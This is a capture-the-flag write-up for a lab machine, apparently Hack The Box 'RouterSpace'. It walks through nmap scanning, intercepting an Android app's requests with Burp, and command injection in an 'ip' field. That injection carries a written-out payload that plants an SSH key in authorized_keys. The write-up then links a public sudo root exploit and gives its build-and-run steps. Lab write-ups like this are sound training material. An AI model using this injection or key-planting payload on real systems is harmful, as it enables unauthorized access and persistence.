As always, we start with nmap to discover open ports.
Nmap Scan
nmap -sC -sV -oA routerSpace 10.10.11.148
Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-90752
| Content-Type: text/html; charset=utf-8
| Content-Length: 83
| ETag: W/"53-1CPF2lTAVDqjw0ulBsW5R961pkE"
| Date: Wed, 06 Jul 2022 19:33:03 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: gDdeM 7Oi rA q Q dB 1qhNmgI }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-15939
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Wed, 06 Jul 2022 19:33:01 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-33000
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Wed, 06 Jul 2022 19:33:02 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-title: RouterSpace
We have two open ports, SSH on 22 and HTTP on 80, and neither reported version has any serious known vulnerabilities. There is nothing to do with SSH for now, so let's enumerate port 80.
HTTP Enumeration
Browsing to http://10.10.11.148/ we see a static HTML page, but there is a download button that serves an APK file.
Now we need to know what this app does, so let's install it on an Android emulator and configure Burp Suite to listen on all interfaces so it can intercept the emulator's traffic. Any Android emulator will do; I will use Genymotion for this one.
First, configure Burp to listen on all interfaces on port 8081.
Next, configure the proxy settings on the emulator under Settings -> Wi-Fi -> Modify Network -> Proxy.
The last step is to drag and drop the APK file onto the emulator to install it.
The application has only a “Check Status” button. When we click it and open the HTTP history tab in Burp Suite, we see a POST request to http://routerspace.htb with no response (because our machine doesn't know how to resolve routerspace.htb).
So let's add this hostname to the hosts file and click the “Check Status” button again.
Now we see a response.
Let's send this request to Repeater to play with it.
Initial Foothold / User
The first thing that came to my mind was that the machine might run a system command on the ip parameter, something like ping -c1 <ip>, to check whether the specified IP is up, so I tried injecting whoami into the ip parameter.
It works, and I can execute commands as the user paul.
I tried to get a reverse shell in various ways but failed, so I just put my SSH public key in the authorized_keys file and SSHed into the machine as paul.
Payload: ;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVd5Cr7JucC1oFvizD2p9lBPCGuWR7H7COIYtZnrwLJomv1jvt5P26ayTOrB44HkaPsFJlBX0r+IsUdfbg0C0THEWXK2YYuik5drXUapmyhoh+o/2+u/KPtdq6+XjaUQ712mXXK1pSC7QpHjTcyVjyvr0zjAUW+MZwo0uUsLaDa/wsoWoFDoJ0iZqtMw/uz9WtOywKMu425eRs5C2us1AebpAMn7FO3tDLPLgSv4z6XUfYDR7VtBCZNKiX6ob2VfEnKSNhPiMiGzWEnrEZec6Gb4jpcMsxazmHzN5lcRBvILaacRgYyIJom5aWI7F9YX5e+IIBj03f+VbMU4hgbZw7 > ~/.ssh/authorized_keys;
Getting Root
I ran linpeas.sh and quickly found that the sudo version may be vulnerable.
So I searched for public exploits for this version and found this repository.
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
I cloned this repo but couldn't transfer the files to the machine, so I copied and pasted the three files (exploit.c, shellcode.c, Makefile) instead.
Finally, run make, then ./exploit, and we are root on the box!